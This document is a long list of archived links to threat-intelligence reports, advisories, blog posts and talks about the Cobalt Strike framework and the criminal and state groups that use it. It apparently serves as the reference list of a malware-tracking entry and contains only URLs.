- https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks - webarchive
- https://blog.zsec.uk/cobalt-strike-profiles/ - webarchive
- https://isc.sans.edu/diary/rss/27618 - webarchive
- https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns - webarchive
- https://asec.ahnlab.com/en/47455/ - webarchive
- https://isc.sans.edu/diary/28636 - webarchive
- https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf - webarchive
- https://malwarebookreports.com/cryptone-cobalt-strike/ - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://blog.talosintelligence.com/warmcookie-analysis/ - webarchive
- https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos - webarchive
- https://hitcon.org/2024/CMT/slides/Sailing_the_Seven_SEAs_Deep_Dive_into_Polaris_Arsenal_and_Intelligence_Insights.pdf - webarchive
- https://www.inde.nz/blog/different-kind-of-zoombomb - webarchive
- https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor - webarchive
- https://www.youtube.com/watch?v=C733AyPzkoc - webarchive
- https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/ - webarchive
- https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html - webarchive
- https://www.secureworks.com/research/threat-profiles/tin-woodlawn - webarchive
- https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt - webarchive
- https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/ - webarchive
- https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf - webarchive
- https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang - webarchive
- https://www.qurium.org/alerts/targeted-malware-against-crph/ - webarchive
- https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/ - webarchive
- https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk - webarchive
- https://cert.gov.ua/article/703548 - webarchive
- https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html - webarchive
- https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e - webarchive
- https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/ - webarchive
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf - webarchive
- https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/ - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html - webarchive
- https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py - webarchive
- https://embee-research.ghost.io/decoding-a-cobalt-strike-vba-loader-with-cyberchef/ - webarchive
- https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection - webarchive
- https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153 - webarchive
- https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html - webarchive
- https://community.riskiq.com/article/f0320980 - webarchive
- https://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/ - webarchive
- https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/ - webarchive
- https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/ - webarchive
- https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink - webarchive
- https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/ - webarchive
- https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - webarchive
- https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/ - webarchive
- https://www.secureworks.com/research/darktortilla-malware-analysis - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2024-1209.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader - webarchive
- https://msrc.microsoft.com/blog/2022/10/hunting-for-cobalt-strike-mining-and-plotting-for-fun-and-profit/ - webarchive
- https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://www.youtube.com/watch?v=FC9ARZIZglI - webarchive
- https://blog.checkpoint.com/research/chinese-espionage-campaign-expands-to-target-africa-and-the-caribbean/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-249a - webarchive
- https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/ - webarchive
- https://www.lac.co.jp/lacwatch/people/20180521_001638.html - webarchive
- https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/ - webarchive
- https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/ - webarchive
- https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/ - webarchive
- https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618 - webarchive
- https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md - webarchive
- https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx - webarchive
- https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/ - webarchive
- https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728 - webarchive
- https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/ - webarchive
- https://www.mandiant.com/resources/defining-cobalt-strike-components - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf - webarchive
- https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/ - webarchive
- https://www.youtube.com/watch?v=borfuQGrB8g - webarchive
- https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns - webarchive
- https://isc.sans.edu/diary/27308 - webarchive
- https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html - webarchive
- https://www.youtube.com/watch?v=XfUTpwZKCDU - webarchive
- https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks - webarchive
- https://embee-research.ghost.io/ghidra-basics-shellcode-analysis/ - webarchive
- https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia - webarchive
- https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine - webarchive
- https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html - webarchive
- https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis - webarchive
- https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware - webarchive
- https://awakesecurity.com/blog/catching-the-white-stork-in-flight/ - webarchive
- https://isc.sans.edu/diary/rss/28752 - webarchive
- https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike - webarchive
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/ - webarchive
- https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise - webarchive
- https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/ - webarchive
- https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/ - webarchive
- https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/ - webarchive
- http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf - webarchive
- https://content.fireeye.com/m-trends/rpt-m-trends-2020 - webarchive
- https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/ - webarchive
- https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/ - webarchive
- https://embeeresearch.io/ghidra-entropy-analysis-locating-decryption-functions/ - webarchive
- https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/ - webarchive
- https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/ - webarchive
- https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - webarchive
- https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments - webarchive
- https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks - webarchive
- https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/ - webarchive
- https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-riverside - webarchive
- https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/ - webarchive
- https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/ - webarchive
- https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html - webarchive
- https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/ - webarchive
- https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/ - webarchive
- https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/ - webarchive
- https://embee-research.ghost.io/unpacking-malware-with-hardware-breakpoints-cobalt-strike/ - webarchive
- https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf - webarchive
- https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach - webarchive
- https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a - webarchive
- https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader - webarchive
- https://cert.gov.ua/article/339662 - webarchive
- https://isc.sans.edu/diary/rss/27176 - webarchive
- https://embee-research.ghost.io/shodan-censys-queries/ - webarchive
- https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/ - webarchive
- https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion - webarchive
- https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/ - webarchive
- https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/ - webarchive
- https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/ - webarchive
- https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A - webarchive
- https://twitter.com/redcanary/status/1334224861628039169 - webarchive
- https://www.mandiant.com/resources/apt41-us-state-governments - webarchive
- https://explore.group-ib.com/htct/hi-tech_crime_2018 - webarchive
- https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 - webarchive
- https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus - webarchive
- https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html - webarchive
- https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2 - webarchive
- https://blog.macnica.net/blog/2020/11/dtrack.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021 - webarchive
- https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-president - webarchive
- https://twitter.com/AltShiftPrtScn/status/1350755169965924352 - webarchive
- https://www.cynet.com/understanding-squirrelwaffle/ - webarchive
- https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/ - webarchive
- https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/ - webarchive
- https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf - webarchive
- https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ - webarchive
- https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html - webarchive
- https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/ - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://twitter.com/alex_lanstein/status/1399829754887524354 - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/ - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf - webarchive
- https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a - webarchive
- https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/ - webarchive
- https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/ - webarchive
- https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/ - webarchive
- https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/ - webarchive
- https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes - webarchive
- https://isc.sans.edu/diary/rss/26862 - webarchive
- https://blog.cobaltstrike.com/ - webarchive
- https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control - webarchive
- https://paper.seebug.org/1301/ - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf - webarchive
- https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services - webarchive
- https://www.malware-traffic-analysis.net/2023/10/03/index.html - webarchive
- https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/ - webarchive
- https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://securelist.com/apt-luminousmoth/103332/ - webarchive
- https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42 - webarchive
- https://vanmieghem.io/blueprint-for-evading-edr-in-2022/ - webarchive
- https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966 - webarchive
- https://pylos.co/2018/11/18/cozybear-in-from-the-cold/ - webarchive
- https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/ - webarchive
- https://twitter.com/TheDFIRReport/status/1359669513520873473 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/hydrochasma-asia-medical-shipping-intelligence-gathering - webarchive
- https://cert.gov.ua/article/37704 - webarchive
- https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730 - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html - webarchive
- https://github.com/sophos-cybersecurity/solarwinds-threathunt - webarchive
- https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html - webarchive
- https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ - webarchive
- https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ - webarchive
- https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929 - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike# - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html - webarchive
- https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups - webarchive
- https://twitter.com/elisalem9/status/1398566939656601606 - webarchive
- https://www.sans.org/webcasts/contrarian-view-solarwinds-119515 - webarchive
- https://twitter.com/swisscom_csirt/status/1354052879158571008 - webarchive
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://rastamouse.me/ntlm-relaying-via-cobalt-strike/ - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/ - webarchive
- https://www.mandiant.com/media/10916/download - webarchive
- https://medium.com/@b.magnezi/malware-analysis-cobalt-strike-92ef02b35ae0 - webarchive
- https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ - webarchive
- https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/ - webarchive
- https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/ - webarchive
- https://thedfirreport.com/2022/04/25/quantum-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://marcoramilli.com/2022/05/10/a-malware-analysis-in-ru-au-conflict/ - webarchive
- https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20 - webarchive
- https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64 - webarchive
- https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan - webarchive
- https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - webarchive
- https://twitter.com/vikas891/status/1385306823662587905 - webarchive
- https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html - webarchive
- https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/ - webarchive
- https://asec.ahnlab.com/ko/19640/ - webarchive
- https://malware-traffic-analysis.net/2021/09/29/index.html - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign - webarchive
- https://www.ic3.gov/Media/News/2021/210823.pdf - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta - webarchive
- https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html - webarchive
- https://asec.ahnlab.com/en/31811/ - webarchive
- https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf - webarchive
- https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2024-0716.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7 - webarchive
- https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/ - webarchive
- https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf - webarchive
- https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/ - webarchive
- https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims - webarchive
- https://twitter.com/ffforward/status/1324281530026524672 - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services - webarchive
- https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/ - webarchive
- https://blog.group-ib.com/REvil_RaaS - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-waterfall - webarchive
- https://embee-research.ghost.io/ghidra-entropy-analysis-locating-decryption-functions/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf - webarchive
- https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations - webarchive
- https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html - webarchive
- https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41 - webarchive
- https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/ - webarchive
- https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel - webarchive
- https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf - webarchive
- https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/ - webarchive
- https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group - webarchive
- https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/ - webarchive
- https://blog.morphisec.com/vmware-identity-manager-attack-backdoor - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf - webarchive
- https://redcanary.com/blog/gootloader - webarchive
- https://boschko.ca/cobalt-strike-process-injection/ - webarchive
- https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a - webarchive
- https://wbglil.gitbook.io/cobalt-strike/ - webarchive
- https://www.brighttalk.com/webcast/7451/462719 - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
- https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/ - webarchive
- https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/ - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/ - webarchive
- https://www.mandiant.com/resources/russian-targeting-gov-business - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/ - webarchive
- https://www.cobaltstrike.com/support - webarchive
- https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/ - webarchive
- https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html - webarchive
- https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-275a - webarchive
- https://research.checkpoint.com/2024/sharp-dragon-expands-towards-africa-and-the-caribbean/ - webarchive
- https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent - webarchive
- https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html - webarchive
- https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ - webarchive
- https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/ - webarchive
- https://twitter.com/felixw3000/status/1521816045769662468 - webarchive
- https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/ - webarchive
- https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/ - webarchive
- https://netresec.com/?b=214d7ff - webarchive
- https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf - webarchive
- https://www.bitsight.com/blog/emotet-botnet-rises-again - webarchive
- https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671 - webarchive
- https://www.youtube.com/watch?v=pIXl79IPkLI - webarchive
- https://x.com/embee_research/status/1736758775326146778 - webarchive
